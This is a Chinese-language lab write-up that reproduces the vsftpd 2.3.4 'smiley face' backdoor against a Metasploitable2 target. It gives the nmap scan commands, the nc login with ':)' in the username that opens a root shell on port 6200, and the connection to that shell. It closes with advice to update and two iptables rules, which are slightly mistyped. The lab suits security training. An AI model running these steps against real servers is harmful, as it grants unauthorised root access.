目录
漏洞简介:
这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行
vsf_sysutil_extra()
:打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞
实验环境:
攻击机:kali 虚拟机 靶机:Metasplotable2-Linux
虚拟机的网络连接都选择 NAT模式
实验准备
①nmap命令扫描找出同网段下靶机的IP(我只开了两个虚拟机,所以我nmap出来的两个ip除了主机就是靶机,其目的最终只是要找到靶机ip,可以有多种途径)
nmap 192.xxx.xxx.0/24 (这里192.xxx.xxx是网段,即IP192.xxx.xxx.xxx的前三部分,该命令用来扫描相同网段下存活的主机)
得到靶机ip并发现打开着21ftp服务端口
②获取版本号
nmap -sV 靶机的ip地址
发现是21端口那里使用的ftp服务是 vsftpd 2.3.4版本,所以知道靶机有笑脸漏洞
实验过程
①
|
kali终端依次输入命令:nc 目标靶机ip地址 21 user a:) (用户名必须带笑脸即 ":)" ) pass 1111 (密码随意) |
② 开启一个新的kali窗口输入下面命令
namp -p 6200 目标靶机的ip地址
在①操作登陆前和登陆后6200端口开放的情况
③输入命令连接6200端口后门
nc 目标靶机ip 6200
如上就是连接上6200端口,证明漏洞复现成功了,就是靶机的root管理员了,相当于利用漏洞获取了靶机管理权
小总结
①一些服务的版本的更新换代是解决已发现的一些漏洞来提高安全保障,像这个带有vsftpd 2.3.4版本的服务器的21端口就已经是很久远的漏洞了,早已被修复,只能用来做训练,但我们要知道的是我们要及时更新
②一些防范后门措施
安全配置
iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去